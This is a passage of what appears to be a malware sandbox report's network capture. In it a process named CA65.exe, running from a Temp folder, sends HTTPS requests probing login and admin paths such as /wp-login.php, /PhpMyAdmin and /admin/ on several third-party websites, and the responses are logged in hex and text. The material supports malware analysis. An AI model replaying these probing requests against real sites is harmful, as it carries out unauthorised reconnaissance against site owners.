'uqir0+NG5Aw7Ss8kzhUzEKHxE1lFeXH05jzAUBX6240=',uh: 'fjVJXrTY+Lx0zetVy/BrdjoQhneYIb6iK9Fl/vXmBos=',hh: 'wZMqaDEd23+GXpHscBMrVN6JLSeECN+GjGmjr67ZG4g=',}};var cpo = document.createElement('script');
2023-12-22 20:15:12 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
326	192.168.2.4	57547	34.206.39.153	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:12 UTC	196	OUT	GET / HTTP/1.1 Host: www.org.com Accept: / Accept-Encoding: deflate, gzip Cookie: SERVERID=vpc4\|ZYXxL\|ZYXxL User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:13 UTC	2164	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 22 Dec 2023 20:15:12 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff X-Download-Options: noopen X-Permitted-Cross-Domain-Policies: none Referrer-Policy: strict-origin-when-cross-origin X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAL/3/SrV7P8AsTHMFSpPmYbyv2PkACHwmG9Z+1IFZq3vA54IN7pQcGnhgNo+8SN9r/KtUWCb9OPqTfWM1N4w/EUCAwEAAQ==_KMXX1whE+LqWlnBOIB0xJLwpzXTVIVXwtPxBqo7TtwcgcTbCRX6lgnGBFcKSpdQQU799kZ0mJJU8T3hRE6kHVQ== Access-Control-Allow-Origin: * Access-Control-Allow-Methods: * Access-Control-Request-Method: * Access-Control-Allow-Headers: * Access-Control-Max-Age: 86400 Link: </packs/js/abp2-e13b4cce38d2e6b3aea7.js>; rel=preload; as=script; nopush,</packs/js/ads-4b8a83b0bbaf60e589e0.js>; rel=preload; as=script; nopush,</packs/js/abp2-e13b4cce38d2e6b3aea7.js>; rel=preload; as=script; nopush,</assets/application-89128245420e03526773926b09a5a7512357bf5fc597732c13596d8a84efe0b7.css>; rel=preload; as=style; nopush,</packs/js/application-28182f954f58ae153a93.js>; rel=preload; as=script; nopush,</assets/style-89128245420e03526773926b09a5a7512357bf5fc597732c13596d8a84efe0b7.css>; rel=preload; as=style; nopush,</assets/generic_lander-8c18c01aab6b1d2ebf833256e6dbdff67d20807e508d45e59875a48594655ea7.css>; rel=preload; as=style; nopush,<///ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js>; rel=preload; as=script; nopush Vary: Accept ETag: W/"a7319a71eb2aa3ec786ca6bfcc87df9c" Cache-Control: max-age=0, private, must-revalidate Set-Cookie: _digiadmin3_session=sA%2FJPFfoJVworU4h2n4bPB1Z%2FPxPvMo4nTQaQAW8dq%2FfXXed9tPa1z5RUr6fbRrhOHIsKtqWOpQbc%2BdjGk8TPZNRoaBVH4sliMWNJRo3oSV1sS1dXu14jK3xzk9qTUqCTDQ6uXX3TOdNKX13Oyl1UZKW%2Fb8Y%2FZepyf4TvuQK6tlMZ%2BINKqryxzIx4sTTDNXhKvEg6vQ%2FBaO1o%2F7oqLrLsSB00XGDG9ylnz4whVzHNDB%2BQ4y9VDb6%2FhhCFR%2BKJGS7u6zLrBjjsviJBhS73CNzbAfTw97qRwlcdCRy--Yas9h78xQ8rePd9o--%2BNOSI9Fgx5HL%2FlJCVGEHIQ%3D%3D; path=/; HttpOnly; SameSite=Lax X-Request-Id: 2c1841d4-3eeb-4b97-a89c-51168473658c X-Runtime: 0.133671
2023-12-22 20:15:13 UTC	11415	IN	Data Raw: 37 66 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 27 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4c 2f 33 2f 53 72 56 37 50 38 41 73 54 48 4d 46 53 70 50 6d 59 62 79 76 32 50 6b 41 43 48 77 6d 47 39 5a 2b 31 49 46 5a 71 33 76 41 35 34 49 4e 37 70 51 63 47 6e 68 67 4e 6f 2b 38 53 4e 39 72 2f 4b 74 55 57 43 62 39 4f 50 71 54 66 57 4d 31 4e 34 77 2f 45 55 43 41 77 45 41 41 51 3d 3d 5f 4b 4d 58 58 31 77 68 45 2b 4c 71 57 6c 6e 42 4f 49 42 30 78 4a 4c 77 70 7a 58 54 56 49 56 58 77 74 50 78 42 71 6f 37 54 74 77 63 67 63 54 62 43 52 58 36 6c 67 6e 47 42 46 63 4b 53 70 64 51 51 55 37 39 39 6b 5a 30 6d 4a 4a 55 38 54 33 68 52 45 36 Data Ascii: 7ff<!DOCTYPE html><html data-adblockkey='MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAL/3/SrV7P8AsTHMFSpPmYbyv2PkACHwmG9Z+1IFZq3vA54IN7pQcGnhgNo+8SN9r/KtUWCb9OPqTfWM1N4w/EUCAwEAAQ==_KMXX1whE+LqWlnBOIB0xJLwpzXTVIVXwtPxBqo7TtwcgcTbCRX6lgnGBFcKSpdQQU799kZ0mJJU8T3hRE6

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
327	192.168.2.4	57701	104.26.0.173	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:12 UTC	246	OUT	GET /wp-login.php?redirect_to=https%3A%2F%2Ftheproducebox.com%2Fwp-admin%2F&reauth=1 HTTP/1.1 Host: theproducebox.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:13 UTC	1362	IN	HTTP/1.1 200 OK Date: Fri, 22 Dec 2023 20:15:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/7.4.15 Pragma: no-cache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Cache-Control: max-age=0, no-cache, s-maxage=10 X-Frame-Options: SAMEORIGIN Set-Cookie: PHPSESSID=bbc76ng8ktm78c1ea1052vlibv; path=/ Set-Cookie: wordpress_test_cookie=WP%20Cookie%20check; path=/; secure Set-Cookie: wordpress_0064c9ffb65445fc4fc1234e1ef4fda9=%20; expires=Thu, 22-Dec-2022 20:15:12 GMT; Max-Age=0; path=/wp-admin Set-Cookie: wordpress_sec_0064c9ffb65445fc4fc1234e1ef4fda9=%20; expires=Thu, 22-Dec-2022 20:15:12 GMT; Max-Age=0; path=/wp-admin Set-Cookie: wordpress_0064c9ffb65445fc4fc1234e1ef4fda9=%20; expires=Thu, 22-Dec-2022 20:15:12 GMT; Max-Age=0; path=/wp-content/plugins Set-Cookie: wordpress_sec_0064c9ffb65445fc4fc1234e1ef4fda9=%20; expires=Thu, 22-Dec-2022 20:15:12 GMT; Max-Age=0; path=/wp-content/plugins Set-Cookie: wordpress_logged_in_0064c9ffb65445fc4fc1234e1ef4fda9=%20; expires=Thu, 22-Dec-2022 20:15:12 GMT; Max-Age=0; path=/ Set-Cookie: wordpress_logged_in_0064c9ffb65445fc4fc1234e1ef4fda9=%20; expires=Thu, 22-Dec-2022 20:15:12 GMT; Max-Age=0; path=/ Set-Cookie: wp-settings-0=%20; expires=Thu, 22-Dec-2022 20:15:12 GMT; Max-Age=0; path=/
2023-12-22 20:15:13 UTC	1261	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 77 70 2d 73 65 74 74 69 6e 67 73 2d 74 69 6d 65 2d 30 3d 25 32 30 3b 20 65 78 70 69 72 65 73 3d 54 68 75 2c 20 32 32 2d 44 65 63 2d 32 30 32 32 20 32 30 3a 31 35 3a 31 32 20 47 4d 54 3b 20 4d 61 78 2d 41 67 65 3d 30 3b 20 70 61 74 68 3d 2f 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 77 6f 72 64 70 72 65 73 73 5f 30 30 36 34 63 39 66 66 62 36 35 34 34 35 66 63 34 66 63 31 32 33 34 65 31 65 66 34 66 64 61 39 3d 25 32 30 3b 20 65 78 70 69 72 65 73 3d 54 68 75 2c 20 32 32 2d 44 65 63 2d 32 30 32 32 20 32 30 3a 31 35 3a 31 32 20 47 4d 54 3b 20 4d 61 78 2d 41 67 65 3d 30 3b 20 70 61 74 68 3d 2f 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 77 6f 72 64 70 72 65 73 73 5f 30 30 36 34 63 39 66 66 62 36 35 34 34 35 66 63 34 66 63 31 32 Data Ascii: Set-Cookie: wp-settings-time-0=%20; expires=Thu, 22-Dec-2022 20:15:12 GMT; Max-Age=0; path=/Set-Cookie: wordpress_0064c9ffb65445fc4fc1234e1ef4fda9=%20; expires=Thu, 22-Dec-2022 20:15:12 GMT; Max-Age=0; path=/Set-Cookie: wordpress_0064c9ffb65445fc4fc12
2023-12-22 20:15:13 UTC	375	IN	Data Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 72 25 32 46 41 5a 4e 64 6c 38 61 72 58 4b 52 55 67 4c 67 4b 4f 66 68 55 66 48 43 75 4a 74 52 48 30 67 54 57 37 32 61 4f 67 4e 36 4a 44 69 34 4a 63 43 71 49 63 68 63 4e 39 46 70 35 56 43 4d 78 57 50 43 4b 74 78 64 55 63 62 42 56 41 4a 4e 51 50 49 32 57 50 51 4d 65 25 32 42 75 72 69 33 67 76 46 50 32 66 62 78 4b 66 65 46 35 32 4c 45 25 32 46 66 33 46 71 41 77 5a 33 42 7a 7a 6e 47 7a 67 32 66 63 67 4e 39 79 34 78 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=r%2FAZNdl8arXKRUgLgKOfhUfHCuJtRH0gTW72aOgN6JDi4JcCqIchcN9Fp5VCMxWPCKtxdUcbBVAJNQPI2WPQMe%2Buri3gvFP2fbxKfeF52LE%2Ff3FqAwZ3BzznGzg2fcgN9y4x"}],"group":"cf-nel","max_age":604800}
2023-12-22 20:15:13 UTC	1369	IN	Data Raw: 31 36 36 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 2f 3e 0a 09 3c 74 69 74 6c 65 3e 4c 6f 67 20 49 6e 20 26 6c 73 61 71 75 6f 3b 20 54 68 65 20 50 72 6f 64 75 63 65 20 42 6f 78 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 Data Ascii: 166d<!DOCTYPE html><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/><title>Log In &lsaquo; The Produce Box — WordPress</title><meta name='robots' content='noindex, follow'/><link rel='styleshe
2023-12-22 20:15:13 UTC	1369	IN	Data Raw: 2e 70 68 70 22 20 6d 65 74 68 6f 64 3d 22 70 6f 73 74 22 3e 0a 09 09 09 3c 70 3e 0a 09 09 09 09 3c 6c 61 62 65 6c 20 66 6f 72 3d 22 75 73 65 72 5f 6c 6f 67 69 6e 22 3e 55 73 65 72 6e 61 6d 65 20 6f 72 20 45 6d 61 69 6c 20 41 64 64 72 65 73 73 3c 2f 6c 61 62 65 6c 3e 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 6e 61 6d 65 3d 22 6c 6f 67 22 20 69 64 3d 22 75 73 65 72 5f 6c 6f 67 69 6e 22 20 63 6c 61 73 73 3d 22 69 6e 70 75 74 22 20 76 61 6c 75 65 3d 22 22 20 73 69 7a 65 3d 22 32 30 22 20 61 75 74 6f 63 61 70 69 74 61 6c 69 7a 65 3d 22 6f 66 66 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 75 73 65 72 6e 61 6d 65 22 20 72 65 71 75 69 72 65 64 3d 22 72 65 71 75 69 72 65 64 22 2f 3e 0a 09 09 09 3c 2f 70 3e 0a 0a 09 09 09 3c 64 69 Data Ascii: .php" method="post"><p><label for="user_login">Username or Email Address</label><input type="text" name="log" id="user_login" class="input" value="" size="20" autocapitalize="off" autocomplete="username" required="required"/></p><di
2023-12-22 20:15:13 UTC	1369	IN	Data Raw: 6f 72 64 3f 3c 2f 61 3e 09 09 09 3c 2f 70 3e 0a 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 2f 2f 3c 21 5b 43 44 41 54 41 5b 0a 66 75 6e 63 74 69 6f 6e 20 77 70 5f 61 74 74 65 6d 70 74 5f 66 6f 63 75 73 28 29 7b 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 64 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 75 73 65 72 5f 6c 6f 67 69 6e 22 29 3b 64 2e 66 6f 63 75 73 28 29 3b 64 2e 73 65 6c 65 63 74 28 29 3b 7d 63 61 74 63 68 28 65 72 29 7b 7d 7d 2c 32 30 30 29 3b 7d 77 70 5f 61 74 74 65 6d 70 74 5f 66 6f 63 75 73 28 29 3b 69 66 28 74 79 70 65 6f 66 20 77 70 4f 6e 6c 6f 61 64 3d 3d 3d 27 66 75 6e 63 74 69 6f 6e 27 29 7b 77 70 4f 6e 6c 6f Data Ascii: ord?</a></p><script type="text/javascript">//<![CDATA[function wp_attempt_focus(){setTimeout(function(){try{d=document.getElementById("user_login");d.focus();d.select();}catch(er){}},200);}wp_attempt_focus();if(typeof wpOnload==='function'){wpOnlo
2023-12-22 20:15:13 UTC	1369	IN	Data Raw: 64 75 63 65 62 6f 78 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 64 69 73 74 2f 76 65 6e 64 6f 72 2f 77 70 2d 70 6f 6c 79 66 69 6c 6c 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 33 2e 31 35 2e 30 22 20 69 64 3d 22 77 70 2d 70 6f 6c 79 66 69 6c 6c 2d 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 74 68 65 70 72 6f 64 75 63 65 62 6f 78 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 64 69 73 74 2f 68 6f 6f 6b 73 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 63 36 61 65 63 39 61 38 64 34 65 35 61 35 64 35 34 33 61 31 22 20 69 64 3d 22 77 70 2d 68 6f 6f 6b 73 2d 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 Data Ascii: ducebox.com/wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=3.15.0" id="wp-polyfill-js"></script><script type="text/javascript" src="https://theproducebox.com/wp-includes/js/dist/hooks.min.js?ver=c6aec9a8d4e5a5d543a1" id="wp-hooks-js"></script><script
2023-12-22 20:15:13 UTC	273	IN	Data Raw: 70 74 22 20 69 64 3d 22 75 73 65 72 2d 70 72 6f 66 69 6c 65 2d 6a 73 2d 65 78 74 72 61 22 3e 2f 2f 3c 21 5b 43 44 41 54 41 5b 0a 76 61 72 20 75 73 65 72 50 72 6f 66 69 6c 65 4c 31 30 6e 3d 7b 22 75 73 65 72 5f 69 64 22 3a 22 30 22 2c 22 6e 6f 6e 63 65 22 3a 22 66 34 30 64 31 32 37 39 61 39 22 7d 3b 0a 2f 2f 5d 5d 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 74 68 65 70 72 6f 64 75 63 65 62 6f 78 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 6a 73 2f 75 73 65 72 2d 70 72 6f 66 69 6c 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 34 2e 32 22 20 69 64 3d 22 75 73 65 72 2d 70 72 6f 66 69 6c 65 2d 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f Data Ascii: pt" id="user-profile-js-extra">//<![CDATA[var userProfileL10n={"user_id":"0","nonce":"f40d1279a9"};//...</script><script type="text/javascript" src="https://theproducebox.com/wp-admin/js/user-profile.min.js?ver=6.4.2" id="user-profile-js"></script></
2023-12-22 20:15:13 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
328	192.168.2.4	57598	104.24.82.4	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:12 UTC	175	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: thenile.com.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:13 UTC	629	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 22 Dec 2023 20:15:12 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close location: https://www.thenile.com.au/PhpMyAdmin/ via: 1.1 google CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2FHzHH6zrCAkKYzC%2BvP2%2BlYv6GGIBG5S6zZYLGo96vcBNfUhDYHZ2MDeoJ9gBY6jAY%2FYGhVoxltTopkXYCIU2TDC31r%2BxrHp0HpmpdNTYNkKcXiWAO6DkQCrYIQB9rKCq"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 839b09199c270331-MIA
2023-12-22 20:15:13 UTC	252	IN	Data Raw: 66 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 68 65 6e 69 6c 65 2e 63 6f 6d 2e 61 75 2f 50 68 70 4d 79 41 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a Data Ascii: f6<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.thenile.com.au/PhpMyAdmin/">here</a>.</p></body></html>
2023-12-22 20:15:13 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
329	192.168.2.4	57606	13.35.116.12	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:12 UTC	174	OUT	GET /PhpMyAdmin HTTP/1.1 Host: www.wika.co.in Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:13 UTC	1149	IN	HTTP/1.1 301 Moved Permanently Content-Type: text/html; charset=utf-8 Content-Length: 180 Connection: close Date: Fri, 22 Dec 2023 20:15:11 GMT Server: web Location: https://www.wika.com/en-in/PhpMyAdmin X-Rewritten-By: ManagedFusion (rewriter; reverse-proxy; +http://managedfusion.com/) X-ManagedFusion-Rewriter-Version: 3.7 X-UA-Compatible: IE=edge strict-transport-security: max-age=31536000; includeSubDomains; Content-Security-Policy: default-src * data: blob: filesystem: about: ws: wss: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src * data: blob: ; style-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline'; Referrer-Policy: strict-origin-when-cross-origin X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XXS-Protection: 1; mode=block X-Powered-By: ARR/3.0 X-Cache: Miss from cloudfront Via: 1.1 f0ccde3c63bb0c13552807c8453d7f50.cloudfront.net (CloudFront) X-Amz-Cf-Pop: MIA3-C2 X-Amz-Cf-Id: 3nsTITKeid_3qe7hdS6Xn5poWCYts0YfuL6leR6R0TiLQ22R7RsaYA==
2023-12-22 20:15:13 UTC	180	IN	Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 70 3e 54 68 65 20 55 52 49 20 74 68 61 74 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 68 61 73 20 62 65 65 6e 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 77 69 6b 61 2e 63 6f 6d 2f 65 6e 2d 69 6e 2f 50 68 70 4d 79 41 64 6d 69 6e 22 3e 6d 6f 76 65 64 20 74 6f 20 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>Moved Permanently</title></head><body><p>The URI that you requested has been <a href="https://www.wika.com/en-in/PhpMyAdmin">moved to here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
330	192.168.2.4	57689	141.193.213.10	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:12 UTC	330	OUT	GET /admin/ HTTP/1.1 Host: jaydien.com Accept: / Accept-Encoding: deflate, gzip Cookie: __cf_bm=ADNj9QYSi5Dd9_9biJU3scpPOMQ34zi3XIX_UVRnrc8-1703276111-1-AZD5vYYoWAzXjD8ewmwnDWnJtqsU9ODogsJ67cqVsY7G5qJyg89RP7+4DptrAd08jYbe9xobLiQyADzcu9wlzQ8= User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:13 UTC	1357	IN	HTTP/1.1 403 Forbidden Date: Fri, 22 Dec 2023 20:15:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Vary: Accept-Encoding Set-Cookie: apbct_timestamp=1703276113; path=/; secure; HttpOnly; SameSite=Lax Set-Cookie: apbct_site_landing_ts=1703276113; path=/; secure; HttpOnly; SameSite=Lax Set-Cookie: apbct_page_hits=1; path=/; secure; HttpOnly; SameSite=Lax Set-Cookie: apbct_cookies_test=%257B%2522cookies_names%2522%253A%255B%2522apbct_timestamp%2522%252C%2522apbct_site_landing_ts%2522%252C%2522apbct_page_hits%2522%255D%252C%2522check_value%2522%253A%25226ac55ec79b310cf67b6e7d2d254a24f7%2522%257D; path=/; secure; HttpOnly; SameSite=Lax Set-Cookie: apbct_urls=%7B%22jaydien.com%2Fadmin%2F%22%3A%5B1703276113%5D%7D; expires=Mon, 25 Dec 2023 20:15:13 GMT; Max-Age=259200; path=/; domain=jaydien.com; secure; HttpOnly; SameSite=Lax Set-Cookie: apbct_site_referer=UNKNOWN; expires=Mon, 25 Dec 2023 20:15:13 GMT; Max-Age=259200; path=/; domain=jaydien.com; secure; HttpOnly; SameSite=Lax Expires: Fri, 01 Jan 71 00:00:00 +0000 Pragma: no-cache X-Powered-By: WP Engine X-Cacheable: NO:403 Cache-Control: max-age=0, must-revalidate, private X-Cache: MISS X-Cache-Group: normal CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 839b09199f15099e-MIA
2023-12-22 20:15:13 UTC	32	IN	Data Raw: 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a Data Ascii: alt-svc: h3=":443"; ma=86400
2023-12-22 20:15:13 UTC	1369	IN	Data Raw: 31 66 39 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 27 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 27 75 74 66 2d 38 27 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 76 69 65 77 70 6f 72 74 27 20 63 6f 6e 74 65 6e 74 3d 27 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 27 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 70 72 69 76 61 74 65 22 3e Data Ascii: 1f93<!DOCTYPE html><html lang='en'><head><meta charset='utf-8' /><meta name='viewport' content='width=device-width, initial-scale=1' /><meta http-equiv="cache-control" content="no-cache"><meta http-equiv="cache-control" content="private">
2023-12-22 20:15:13 UTC	1369	IN	Data Raw: 73 20 69 6e 66 69 6e 69 74 65 20 65 61 73 65 2d 69 6e 2d 6f 75 74 20 62 6f 74 68 3b 0a 09 09 09 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 6b 2d 62 6f 75 6e 63 65 64 65 6c 61 79 20 31 2e 34 73 20 69 6e 66 69 6e 69 74 65 20 65 61 73 65 2d 69 6e 2d 6f 75 74 20 62 6f 74 68 3b 0a 09 09 7d 0a 0a 09 09 2e 73 70 69 6e 6e 65 72 20 2e 62 6f 75 6e 63 65 31 20 7b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 20 2d 30 2e 33 32 73 3b 0a 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 20 2d 30 2e 33 32 73 3b 0a 09 09 7d 0a 0a 09 09 2e 73 70 69 6e 6e 65 72 20 2e 62 6f 75 6e 63 65 32 20 7b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 20 2d 30 2e 31 36 73 3b 0a 09 09 09 61 6e 69 6d 61 74 69 6f Data Ascii: s infinite ease-in-out both;animation: sk-bouncedelay 1.4s infinite ease-in-out both;}.spinner .bounce1 {-webkit-animation-delay: -0.32s;animation-delay: -0.32s;}.spinner .bounce2 {-webkit-animation-delay: -0.16s;animatio
